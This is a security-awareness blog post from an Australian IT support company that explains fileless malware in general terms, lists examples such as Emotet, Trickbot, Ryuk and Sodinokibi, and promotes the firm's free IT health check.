We are often warned about downloading files we are not sure if we can trust, from sources we do not know, as they may contain malware, but are you aware of the threat of fileless malware?
Continue reading to learn more about fileless attacks or if you would prefer to let someone else worry about IT security in your business or organisation call us on (07) 3062 6932 or get in touch online for help with small business IT support, business continuity solutions and security.
What is Fileless Malware?
Fileless malware is a type of malicious computer software that rather than existing as a file on a hard drive, typically exists exclusively in computer memory such as RAM. Because it exists in volatile memory which is cleared when the computer is rebooted, fileless malware leaves very little forensic evidence that could be used to identify and pinpoint the source of any unwanted activity. Fileless malware may be used to deploy other types of malicious software such as ransomware.
How are Fileless Attacks Executed?
On Windows PCs, fileless attacks use legitimate software and programs that typically comes either bundled with or is an integral part of the system. By exploiting tools like Windows PowerShell for example, fileless attacks can execute malicious commands on the target system while remaining undetected. Because PowerShell is a trusted part of the Windows ecosystem, the commands it executes are typically assumed to be genuinely safe. Other common approaches include exploiting features such as Windows Management Instrumentation, the .NET framework and Microsoft Office macros all of which have perfectly legitimate uses and all of which form a part of the Windows system and which this system often depends on to function as intended.
What are Some of the Fileless Malware Examples?
The more recent fileless malware examples utilised the following known malicious software to harm their targets:
- Operation Cobalt Kitty – reported in 2017, this attack targeted a specific global corporation based out of Asia and managed to successfully compromise in excess of forty personal computers and servers. The attackers managed to remain in the affected network undetected by traditional anti-malware countermeasures for at least a year.
- Emotet – which as recently as November 2020 used parked domains for distribution.
- Trickbot – originally starting as a trojan programmed to steal banking details from its victims, Trickbot was used to spread ransomware in late October 2020 targeting US hospitals and healthcare providers at the height of the Covid-19 pandemic in North America. Trickbot was, in fact, used to deliver next malware on our list in this attack, Ryuk.
- Ryuk – a ransomware used to encrypt the infected system rendering data inaccessible until ransom is paid, with a new strain that includes worm-like features allowing Ryuk to self-propagate and distribute itself further, discovered early this year (2021).
- Spelevo – uses social engineering techniques to trick users into infecting themselves without the need to rely on software exploitation.
- Sodinokibi – startingly, Sodinokibi is an example of oraganised cybercrime and a “ransomware as a service operation” where the malware developers recruit affiliates to distribute malicious code on the behalf by providing a malware tooling and sharing in the revenue generated through ransom.
Ultimately, the list above includes only fileless malware examples and is by no means exhaustive. Unfortunately, malicious software continues to evolve every year and the list of fileless malware threats is projected to only grow in the future. It is therefore, now more than ever before, mission critical to be pro-active about cyber security awareness and threat prevention and, should the worst happen, having a business continuity plan even for small business owners.
Put the information technology and security of your business to the test, claim your FREE IT health check from Connected Platforms today, call us on (07) 3062 6932 or get in touch online now to get started today.